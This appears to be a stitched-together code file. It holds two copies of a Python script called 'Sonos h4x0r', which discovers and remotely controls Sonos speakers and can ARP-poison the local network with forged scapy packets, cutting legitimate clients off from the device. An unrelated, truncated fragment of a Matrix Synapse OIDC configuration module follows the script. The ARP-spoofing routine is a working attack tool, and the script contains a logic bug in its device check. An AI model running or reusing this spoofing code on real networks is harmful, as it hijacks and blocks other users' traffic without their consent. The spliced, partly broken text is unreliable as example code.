action="store_true",
help="show verbose output (useful for debugging purposes)"
)
subparser = argsParser.add_subparsers(
dest="command",
title="commands",
help="(use '{command} -h' to list command-specific arguments)")
subparser.required = True
# Define parser rules for different commands
discoveryParser = subparser.add_parser(
"discover",
help="discover sonos devices on the local network")
# For the control parser, we need an extra subparser that parses the action the user
# wants to perform. Also, list the 'ip' argument as required.
controlParser = subparser.add_parser(
"control",
help="control a sonos device on the network")
controlParser.add_argument_group("required arguments").add_argument(
"-ip",
"--address",
required=True,
action="store",
help="the address of the sonos device")
controlParser.add_argument(
"-arp",
"--interface",
required=False,
action="store",
help="after performing the command, perform arp poisoning on specified INTERFACE, obstructing the victim from controlling the device")
actionParser = controlParser.add_subparsers(dest="action", title="action")
actionParser.required = True
actionParser.add_parser("next", help="play next song")
actionParser.add_parser("previous", help="play previous song")
actionParser.add_parser("pause", help="pause music")
actionParser.add_parser("play", help="play music")
volumeParser = actionParser.add_parser("volume", help="control the volume")
volumeParser.add_argument_group("required argument").add_argument("level",
action="store",
type=int,
help="the volume level (0 - 99) to set")
return argsParser.parse_args()
# Initialize arguments
arguments = getArgs()
# Define a list in which we're appending the ip addresses of Sonos devices
# We end up wanting to hijack traffic from the sonos device to those clients.
# This is ONLY necessary when the user wants to perform arp poisoning.
clientList = []
# Initialize logging framework
# Set loglevel to DEBUG if verbose option is specified, otherwise INFO
# Just simply log to stdout with a simple formatter (that's sufficient - no fancy timestamps needed)
verbose = arguments.verbose
logLevel = logging.DEBUG if verbose else logging.INFO
logging.basicConfig(level=logLevel,
format="%(message)s",
handlers=[logging.StreamHandler(sys.stdout)])
logging.getLogger("scapy").setLevel(logging.CRITICAL)
class SonosDevice:
# Represents a sonos device
# Contains the device's IP, serverVersion, and the descriptionLocation
# at which additional information can be retrieved through
# an HTTP GET.
# TODO NIEK: Nice to have: retrieve that additional information and parse the xml to show some.
def __init__(self, ip, serverVersion, descriptionLocation):
self.ip = ip
self.serverVersion = serverVersion
self.descriptionLocation = descriptionLocation
def filterAndGetSonosDevices(dataAddrTupleList):
# Filters Sonos devices from the provided list of strings with udp packet data.
# Argument dataAddrTupleList represents a list of (data, addr) tuples.
# Returns a list of SonosDevice objects.
result = []
sonosRegex = re.compile(r"Sonos", re.MULTILINE)
locationRegex = re.compile(r"^LOCATION: (.*)\r$", re.MULTILINE)
serverVersionRegex = re.compile(r"^SERVER: (.*)\r$", re.MULTILINE)
# Loop over the list of (data, addr) tuples
for entry in dataAddrTupleList:
# entry[0] refers to the "data" part of the tuple
# Note that we still have to decode the (bytes) data
# Check whether the data contains 'Sonos' and both other regex' contain
# a match.
# If so, we assume it's a sonos device.
data = entry[0].decode('utf-8')
# entry[1] returns an (ip, port) tuple: throw away the port, we don't need it.
ip, _ = entry[1]
sonosMatchExists = bool(locationRegex.search(data))
locMatch = locationRegex.search(data)
serverVersionMatch = serverVersionRegex.search(data)
locMatchExists = bool(locMatch)
serverVersionExists = bool(serverVersionMatch)
if sonosMatchExists and locMatchExists and serverVersionExists:
# The found data was about a sonos device
sd = SonosDevice(ip, serverVersionMatch.group(1), locMatch.group(1))
result.append(sd)
# Else: do nothing - the data wasn't about a sonos device or we don't support it
# Done looping the provided list of tuples - we got all devices now.
return result
def discovery():
# Performs service discovery by sending a pre-formed
# UDP packet to the multicast broadcast IP address.
# This packet triggers service discovery by SSDP.
# Returns a list of SonosDevices found
multicast_addr = "239.255.255.250"
ssdp_port = 1900
# This packet contains the following data:
# M-SEARCH * HTTP/1.1
# HOST: 239.255.255.250:1900
# MAN: "ssdp:discover"
# MX: 1
# ST: urn:schemas-upnp-org:device:ZonePlayer:1
# USER-AGENT: Linux UPnP/1.0 Sonos/63.2-89270 (WDCR:Microsoft Windows
# NT 10.0.19042)
# X-SONOS-DEVICEID: 03c8b12a-8339-46da-bd08-f1a2b32d1475
# X-SONOS-SESSIONSECONDS: 11
# X-SONOS-MDPMODEL: 3
svcDiscTrigger = bytes.fromhex("4d2d534541524348202a20485454502f" +
"312e310d0a484f53543a203233392e32" +
"35352e3235352e3235303a313930300d" +
"0a4d414e3a2022737364703a64697363" +
"6f766572220d0a4d583a20310d0a5354" +
"3a2075726e3a736368656d61732d7570" +
"6e702d6f72673a6465766963653a5a6f" +
"6e65506c617965723a310d0a55534552" +
"2d4147454e543a204c696e7578205550" +
"6e502f312e3020536f6e6f732f36332e" +
"322d38393237302028574443523a4d69" +
"63726f736f66742057696e646f777320" +
"4e542031302e302e3139303432290d0a" +
"582d534f4e4f532d4445564943454944" +
"3a2030336338623132612d383333392d" +
"343664612d626430382d663161326233" +
"3264313437350d0a582d534f4e4f532d" +
"53455353494f4e5345434f4e44533a20" +
"31310d0a582d534f4e4f532d4d44504d" +
"4f44454c3a20330d0a0d0a")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Use a random free port and bind to it.
# Then wait a couple tenths of milliseconds to allow the socket to be created;
# we don't want send out a multicast before we're actually listening to the
# socket as that'd mean we would miss some responses.
sock.bind(('', 0))
time.sleep(0.05)
logging.debug(f"Socket (UDP) listening on {sock.getsockname()}")
sent = sock.sendto(svcDiscTrigger, (multicast_addr, ssdp_port))
# Wait for device responses for 3 seconds
startTime = time.time()
responses = []
# While the current time is smaller than startTime + 3 seconds
# (i.e. as long as no more than 3 seconds since start have elapsed)
while (time.time() < startTime + 3):
# Block receive until
recvReady, _, _ = select.select([sock], [], [], 1) # Timeout after 1 second
# Fetch received messages
for s in recvReady:
# We got no clue how big the message will be, read max size.
data, addr = s.recvfrom(65535)
# Add the (data, addr) tuple to the responses
responses.append((data, addr))
logging.debug(f"Packet from {str(addr)}:\n {str(data.decode("utf-8"))}\n")
logging.debug(f"Found {str(len(responses))} devices responding to SSDP on network.")
# Now we've aggregated all responses, we should still filter out the sonos devices.
# There could be other kinds of devices responding to multicast packets.
devices = filterAndGetSonosDevices(responses)
logging.debug(f"Found {str(len(devices))} Sonos devices on network.")
return devices
def setVolume(ip, level):
# Sets the volume of the device at specified IP to the provided level.
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:RenderingControl:1#SetVolume",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/RenderingControl/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:SetVolume xmlns:u=\"urn:schemas-upnp-org:service:RenderingControl:1\"><InstanceID>0</InstanceID>" +
f"<Channel>Master</Channel><DesiredVolume>{level}</DesiredVolume></u:SetVolume></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug(f"Sending volume change request")
request.urlopen(req)
def playNext(ip):
# Play the next song
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Next",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Next xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Next></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending play next request")
request.urlopen(req)
def playPrevious(ip):
# Play the previous song
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Previous",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Previous xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Previous></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending play previous request")
request.urlopen(req)
def pauseMusic(ip):
# Pauzes the music on the device.
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Pause",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Pause xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Pause></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending pause request")
request.urlopen(req)
def playMusic(ip):
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Play",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Play xmlns:" +
"u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID><Speed>1</Speed></u:Play></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug(f"Performing HTTP request to play music")
request.urlopen(req)
def createArpPacket(attackerMac, victimMac, victimIp, ipToSpoof):
# Forges an ARP packet to achieve redirection of traffic to the ipToSpoof
# to the attackerMac, addressed to the victim.
arp = Ether() / ARP()
arp[Ether].src = attackerMac
arp[ARP].hwsrc = attackerMac
arp[ARP].psrc = ipToSpoof
arp[ARP].hwdst = victimMac
arp[ARP].pdst = victimIp
return arp
def arpFilterAndPoison(packet):
# This method filters out interesting arp packets
# We consider an arp packet interesting when it is either tries to
# resolve the address of the sonos device, or when the sonos device
# tries to resolve the address of a client.
# We distinguish the clients by keeping track of who tries to resolve
# the sonos device's address. When a network device tries to resolve
# the sonos device's address, we assume it is a client of it.
# If the sniffed packet originated from ourself, return (skip).
if packet[Ether].src == macSelf:
return
# If the operation is "who-has", then:
if packet[ARP].op == 1:
# If someone asked for the Sonos device's IP, then:
# (Note that the second comparison is required to avoid that we list
# the sonos device as a client of itself when it does gratuitous ARP
# announcements)
if (packet[ARP].pdst == ipSonos) and (packet[ARP].psrc != ipSonos):
logging.debug(f"IP {packet[ARP].pdst} asked for Sonos device IP")
victimMac = packet[ARP].hwsrc
victimIp = packet[ARP].psrc
ipToSpoof = ipSonos
arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipToSpoof)
# Append the victim's IP to the client list
# We've now identified the IP address of a sonos client, so we must make
# sure that when the sonos device tries to contact the client, we hijack
# that communication as well.
logging.debug(f"Add victimIP '{victimIp}' to client list")
clientList.append(victimIp)
# Send it a couple of times to make sure we win the race
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
# If the Sonos device asked for a client device's IP, then:
elif (packet[ARP].pdst in clientList) and (packet[ARP].psrc == ipSonos):
logging.debug(f"IP {packet[ARP].pdst} found in clientlist.")
victimMac = packet[ARP].hwsrc
victimIp = ipSonos
ipToSpoof = packet[ARP].pdst
arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipToSpoof)
# Send it a couple of times to make sure we win the race
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
# If the discover flag was set, start discovery.
if arguments.command == "discover":
logging.debug("Starting discovery")
devices = discovery()
logging.info("Address \t\t Server version \t\t\t\t Location\n")
for dev in devices:
logging.info(f"{dev.ip} \t\t {dev.serverVersion} \t {dev.descriptionLocation}")
exit()
elif arguments.command == "control":
ip = arguments.address
if arguments.action == "volume":
# If the provided level is outside 0-99 range, snap it to closest (0 or 99)
level = max(min(99, arguments.level),0)
logging.debug(f"Changing volume to {level}")
setVolume(ip, level)
logging.info(f"Changed volume to {level}")
elif arguments.action == "next":
logging.debug("Play next song")
playNext(ip)
logging.info("Playing next song")
elif arguments.action == "previous":
logging.debug("Play previous song")
playPrevious(ip)
logging.info("Playing previous song")
elif arguments.action == "pause":
logging.debug("Pause music")
pauseMusic(ip)
logging.info("Paused music")
elif arguments.action == "play":
logging.debug("Play music")
playMusic(ip)
logging.info("Playing music")
# If the arp poisoning option was specified, go into an indefinite sniffing loop now
if arguments.interface:
logging.info("Performing ARP poisoning from/to sonos device, obstructing clients to communicate with it")
snif_interface = arguments.interface
macSelf = get_mac_address(interface=snif_interface)
ipSonos = arguments.address
# Start sniffing for arp packets
# See arpFilterAndPoison() for additional explanation
arpPackets = sniff(count=0, filter="arp", prn=lambda x: arpFilterAndPoison(x))
| import argparse
import logging
import sys
import socket
from typing import ByteString
import select
import time
import re
from urllib import request
import scapy
import getmac
from getmac import get_mac_address
from scapy.all import *
def getArgs():
# Parse command-line arguments
argsParser = argparse.ArgumentParser(
description="Sonos h4x0r.\nEnables you to mess around " +
"with sonos devices on the local network.")
argsParser.add_argument(
"-v",
"--verbose",
required=False,
action="store_true",
help="show verbose output (useful for debugging purposes)"
)
subparser = argsParser.add_subparsers(
dest="command",
title="commands",
help="(use '{command} -h' to list command-specific arguments)")
subparser.required = True
# Define parser rules for different commands
discoveryParser = subparser.add_parser(
"discover",
help="discover sonos devices on the local network")
# For the control parser, we need an extra subparser that parses the action the user
# wants to perform. Also, list the 'ip' argument as required.
controlParser = subparser.add_parser(
"control",
help="control a sonos device on the network")
controlParser.add_argument_group("required arguments").add_argument(
"-ip",
"--address",
required=True,
action="store",
help="the address of the sonos device")
controlParser.add_argument(
"-arp",
"--interface",
required=False,
action="store",
help="after performing the command, perform arp poisoning on specified INTERFACE, obstructing the victim from controlling the device")
actionParser = controlParser.add_subparsers(dest="action", title="action")
actionParser.required = True
actionParser.add_parser("next", help="play next song")
actionParser.add_parser("previous", help="play previous song")
actionParser.add_parser("pause", help="pause music")
actionParser.add_parser("play", help="play music")
volumeParser = actionParser.add_parser("volume", help="control the volume")
volumeParser.add_argument_group("required argument").add_argument("level",
action="store",
type=int,
help="the volume level (0 - 99) to set")
return argsParser.parse_args()
# Initialize arguments
arguments = getArgs()
# Define a list in which we're appending the ip addresses of Sonos devices
# We end up wanting to hijack traffic from the sonos device to those clients.
# This is ONLY necessary when the user wants to perform arp poisoning.
clientList = []
# Initialize logging framework
# Set loglevel to DEBUG if verbose option is specified, otherwise INFO
# Just simply log to stdout with a simple formatter (that's sufficient - no fancy timestamps needed)
verbose = arguments.verbose
logLevel = logging.DEBUG if verbose else logging.INFO
logging.basicConfig(level=logLevel,
format="%(message)s",
handlers=[logging.StreamHandler(sys.stdout)])
logging.getLogger("scapy").setLevel(logging.CRITICAL)
class SonosDevice:
# Represents a sonos device
# Contains the device's IP, serverVersion, and the descriptionLocation
# at which additional information can be retrieved through
# an HTTP GET.
# TODO NIEK: Nice to have: retrieve that additional information and parse the xml to show some.
def __init__(self, ip, serverVersion, descriptionLocation):
self.ip = ip
self.serverVersion = serverVersion
self.descriptionLocation = descriptionLocation
def filterAndGetSonosDevices(dataAddrTupleList):
# Filters Sonos devices from the provided list of strings with udp packet data.
# Argument dataAddrTupleList represents a list of (data, addr) tuples.
# Returns a list of SonosDevice objects.
result = []
sonosRegex = re.compile(r"Sonos", re.MULTILINE)
locationRegex = re.compile(r"^LOCATION: (.*)\r$", re.MULTILINE)
serverVersionRegex = re.compile(r"^SERVER: (.*)\r$", re.MULTILINE)
# Loop over the list of (data, addr) tuples
for entry in dataAddrTupleList:
# entry[0] refers to the "data" part of the tuple
# Note that we still have to decode the (bytes) data
# Check whether the data contains 'Sonos' and both other regex' contain
# a match.
# If so, we assume it's a sonos device.
data = entry[0].decode('utf-8')
# entry[1] returns an (ip, port) tuple: throw away the port, we don't need it.
ip, _ = entry[1]
sonosMatchExists = bool(locationRegex.search(data))
locMatch = locationRegex.search(data)
serverVersionMatch = serverVersionRegex.search(data)
locMatchExists = bool(locMatch)
serverVersionExists = bool(serverVersionMatch)
if sonosMatchExists and locMatchExists and serverVersionExists:
# The found data was about a sonos device
sd = SonosDevice(ip, serverVersionMatch.group(1), locMatch.group(1))
result.append(sd)
# Else: do nothing - the data wasn't about a sonos device or we don't support it
# Done looping the provided list of tuples - we got all devices now.
return result
def discovery():
# Performs service discovery by sending a pre-formed
# UDP packet to the multicast broadcast IP address.
# This packet triggers service discovery by SSDP.
# Returns a list of SonosDevices found
multicast_addr = "239.255.255.250"
ssdp_port = 1900
# This packet contains the following data:
# M-SEARCH * HTTP/1.1
# HOST: 239.255.255.250:1900
# MAN: "ssdp:discover"
# MX: 1
# ST: urn:schemas-upnp-org:device:ZonePlayer:1
# USER-AGENT: Linux UPnP/1.0 Sonos/63.2-89270 (WDCR:Microsoft Windows
# NT 10.0.19042)
# X-SONOS-DEVICEID: 03c8b12a-8339-46da-bd08-f1a2b32d1475
# X-SONOS-SESSIONSECONDS: 11
# X-SONOS-MDPMODEL: 3
svcDiscTrigger = bytes.fromhex("4d2d534541524348202a20485454502f" +
"312e310d0a484f53543a203233392e32" +
"35352e3235352e3235303a313930300d" +
"0a4d414e3a2022737364703a64697363" +
"6f766572220d0a4d583a20310d0a5354" +
"3a2075726e3a736368656d61732d7570" +
"6e702d6f72673a6465766963653a5a6f" +
"6e65506c617965723a310d0a55534552" +
"2d4147454e543a204c696e7578205550" +
"6e502f312e3020536f6e6f732f36332e" +
"322d38393237302028574443523a4d69" +
"63726f736f66742057696e646f777320" +
"4e542031302e302e3139303432290d0a" +
"582d534f4e4f532d4445564943454944" +
"3a2030336338623132612d383333392d" +
"343664612d626430382d663161326233" +
"3264313437350d0a582d534f4e4f532d" +
"53455353494f4e5345434f4e44533a20" +
"31310d0a582d534f4e4f532d4d44504d" +
"4f44454c3a20330d0a0d0a")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Use a random free port and bind to it.
# Then wait a couple tenths of milliseconds to allow the socket to be created;
# we don't want send out a multicast before we're actually listening to the
# socket as that'd mean we would miss some responses.
sock.bind(('', 0))
time.sleep(0.05)
logging.debug(f"Socket (UDP) listening on {sock.getsockname()}")
sent = sock.sendto(svcDiscTrigger, (multicast_addr, ssdp_port))
# Wait for device responses for 3 seconds
startTime = time.time()
responses = []
# While the current time is smaller than startTime + 3 seconds
# (i.e. as long as no more than 3 seconds since start have elapsed)
while (time.time() < startTime + 3):
# Block receive until
recvReady, _, _ = select.select([sock], [], [], 1) # Timeout after 1 second
# Fetch received messages
for s in recvReady:
# We got no clue how big the message will be, read max size.
data, addr = s.recvfrom(65535)
# Add the (data, addr) tuple to the responses
responses.append((data, addr))
logging.debug(f"Packet from {str(addr)}:\n {str(data.decode('utf-8'))}\n")
logging.debug(f"Found {str(len(responses))} devices responding to SSDP on network.")
# Now we've aggregated all responses, we should still filter out the sonos devices.
# There could be other kinds of devices responding to multicast packets.
devices = filterAndGetSonosDevices(responses)
logging.debug(f"Found {str(len(devices))} Sonos devices on network.")
return devices
def setVolume(ip, level):
# Sets the volume of the device at specified IP to the provided level.
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:RenderingControl:1#SetVolume",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/RenderingControl/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:SetVolume xmlns:u=\"urn:schemas-upnp-org:service:RenderingControl:1\"><InstanceID>0</InstanceID>" +
f"<Channel>Master</Channel><DesiredVolume>{level}</DesiredVolume></u:SetVolume></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug(f"Sending volume change request")
request.urlopen(req)
def playNext(ip):
# Play the next song
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Next",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Next xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Next></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending play next request")
request.urlopen(req)
def playPrevious(ip):
# Play the previous song
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Previous",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Previous xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Previous></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending play previous request")
request.urlopen(req)
def pauseMusic(ip):
# Pauzes the music on the device.
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Pause",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
"<s:Body><u:Pause xmlns:u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID></u:Pause></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug("Sending pause request")
request.urlopen(req)
def playMusic(ip):
headers = {
"SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Play",
"CONTENT-TYPE": "text/xml; charset=\"utf-8\""
}
method = "POST"
url = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Play xmlns:" +
"u=\"urn:schemas-upnp-org:service:AVTransport:1\"><InstanceID>0</InstanceID><Speed>1</Speed></u:Play></s:Body></s:Envelope>").encode("utf-8")
req = request.Request(url=url, data=data, headers=headers, method=method)
logging.debug(f"Performing HTTP request to play music")
request.urlopen(req)
def createArpPacket(attackerMac, victimMac, victimIp, ipToSpoof):
# Forges an ARP packet to achieve redirection of traffic to the ipToSpoof
# to the attackerMac, addressed to the victim.
arp = Ether() / ARP()
arp[Ether].src = attackerMac
arp[ARP].hwsrc = attackerMac
arp[ARP].psrc = ipToSpoof
arp[ARP].hwdst = victimMac
arp[ARP].pdst = victimIp
return arp
def arpFilterAndPoison(packet):
# This method filters out interesting arp packets
# We consider an arp packet interesting when it is either tries to
# resolve the address of the sonos device, or when the sonos device
# tries to resolve the address of a client.
# We distinguish the clients by keeping track of who tries to resolve
# the sonos device's address. When a network device tries to resolve
# the sonos device's address, we assume it is a client of it.
# If the sniffed packet originated from ourself, return (skip).
if packet[Ether].src == macSelf:
return
# If the operation is "who-has", then:
if packet[ARP].op == 1:
# If someone asked for the Sonos device's IP, then:
# (Note that the second comparison is required to avoid that we list
# the sonos device as a client of itself when it does gratuitous ARP
# announcements)
if (packet[ARP].pdst == ipSonos) and (packet[ARP].psrc != ipSonos):
logging.debug(f"IP {packet[ARP].pdst} asked for Sonos device IP")
victimMac = packet[ARP].hwsrc
victimIp = packet[ARP].psrc
ipToSpoof = ipSonos
arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipToSpoof)
# Append the victim's IP to the client list
# We've now identified the IP address of a sonos client, so we must make
# sure that when the sonos device tries to contact the client, we hijack
# that communication as well.
logging.debug(f"Add victimIP '{victimIp}' to client list")
clientList.append(victimIp)
# Send it a couple of times to make sure we win the race
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
# If the Sonos device asked for a client device's IP, then:
elif (packet[ARP].pdst in clientList) and (packet[ARP].psrc == ipSonos):
logging.debug(f"IP {packet[ARP].pdst} found in clientlist.")
victimMac = packet[ARP].hwsrc
victimIp = ipSonos
ipToSpoof = packet[ARP].pdst
arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipToSpoof)
# Send it a couple of times to make sure we win the race
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
sendp([arpPacket], loop=0)
# If the discover flag was set, start discovery.
if arguments.command == "discover":
logging.debug("Starting discovery")
devices = discovery()
logging.info("Address \t\t Server version \t\t\t\t Location\n")
for dev in devices:
logging.info(f"{dev.ip} \t\t {dev.serverVersion} \t {dev.descriptionLocation}")
exit()
elif arguments.command == "control":
ip = arguments.address
if arguments.action == "volume":
# If the provided level is outside 0-99 range, snap it to closest (0 or 99)
level = max(min(99, arguments.level),0)
logging.debug(f"Changing volume to {level}")
setVolume(ip, level)
logging.info(f"Changed volume to {level}")
elif arguments.action == "next":
logging.debug("Play next song")
playNext(ip)
logging.info("Playing next song")
elif arguments.action == "previous":
logging.debug("Play previous song")
playPrevious(ip)
logging.info("Playing previous song")
elif arguments.action == "pause":
logging.debug("Pause music")
pauseMusic(ip)
logging.info("Paused music")
elif arguments.action == "play":
logging.debug("Play music")
playMusic(ip)
logging.info("Playing music")
# If the arp poisoning option was specified, go into an indefinite sniffing loop now
if arguments.interface:
logging.info("Performing ARP poisoning from/to sonos device, obstructing clients to communicate with it")
snif_interface = arguments.interface
macSelf = get_mac_address(interface=snif_interface)
ipSonos = arguments.address
# Start sniffing for arp packets
# See arpFilterAndPoison() for additional explanation
arpPackets = sniff(count=0, filter="arp", prn=lambda x: arpFilterAndPoison(x))
|
# Copyright 2020 Quentin Gliech
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import Counter
from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type
import attr
from synapse.config._util import validate_config
from synapse.config.sso import SsoAttributeRequirement
from synapse.types import JsonDict
from synapse.util.module_loader import load_module
from synapse.util.stringutils import parse_and_validate_mxc_uri
from ..util.check_dependencies import DependencyException, check_requirements
from ._base import Config, ConfigError, read_file
DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider"
# The module that JinjaOidcMappingProvider is in was renamed, we want to
# transparently handle both the same.
LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider"
class OIDCConfig(Config):
section = "oidc"
def read_config(self, config, **kwargs) -> None:
self.oidc_providers = tuple(_parse_oidc_provider_configs(config))
if not self.oidc_providers:
return
try:
check_requirements("oidc")
except DependencyException as e:
raise ConfigError(
e.message # noqa: B306, DependencyException.message is a property
) from e
# check we don't have any duplicate idp_ids now. (The SSO handler will also
# check for duplicates when the REST listeners get registered, but that happens
# after synapse has forked so doesn't give nice errors.)
c = Counter([i.idp_id for i in self.oidc_providers])
for idp_id, count in c.items():
if count > 1:
raise ConfigError(
"Multiple OIDC providers have the idp_id %r." % idp_id
)
public_baseurl = self.root.server.public_baseurl
self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback"
@property
def oidc_enabled(self) -> bool:
# OIDC is enabled if we have a provider
return bool(self.oidc_providers)
def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str:
return """\
# List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration
# and login.
#
# Options for each entry include:
#
# idp_id: a unique identifier for this identity provider. Used internally
# by Synapse; should be a single word such as 'github'.
#
# Note that, if this is changed, users authenticating via that provider
# will no longer be recognised as the same user!
#
# (Use "oidc" here if you are migrating from an old "oidc_config"
# configuration.)
#
# idp_name: A user-facing name for this identity provider, which is used to
# offer the user a choice of login mechanisms.
#
# idp_icon: An optional icon for this identity provider, which is presented
# by clients and Synapse's own IdP picker page. If given, must be an
# MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to
# obtain such an MXC URI is to upload an image to an (unencrypted) room
# and then copy the "url" from the source of the event.)
#
# idp_brand: An optional brand for this identity provider, allowing clients
# to style the login flow according to the identity provider in question.
# See the spec for possible options here.
#
# discover: set to 'false' to disable the use of the OIDC discovery mechanism
# to discover endpoints. Defaults to true.
#
# issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery
# is enabled) to discover the provider's endpoints.
#
# client_id: Required. oauth2 client id to use.
#
# client_secret: oauth2 client secret to use. May be omitted if
# client_secret_jwt_key is given, or if client_auth_method is 'none'.
#
# client_secret_jwt_key: Alternative to client_secret: details of a key used
# to create a JSON Web Token to be used as an OAuth2 client secret. If
# given, must be a dictionary with the following properties:
#
# key: a pem-encoded signing key. Must be a suitable key for the
# algorithm specified. Required unless 'key_file' is given.
#
# key_file: the path to file containing a pem-encoded signing key file.
# Required unless 'key' is given.
#
# jwt_header: a dictionary giving properties to include in the JWT
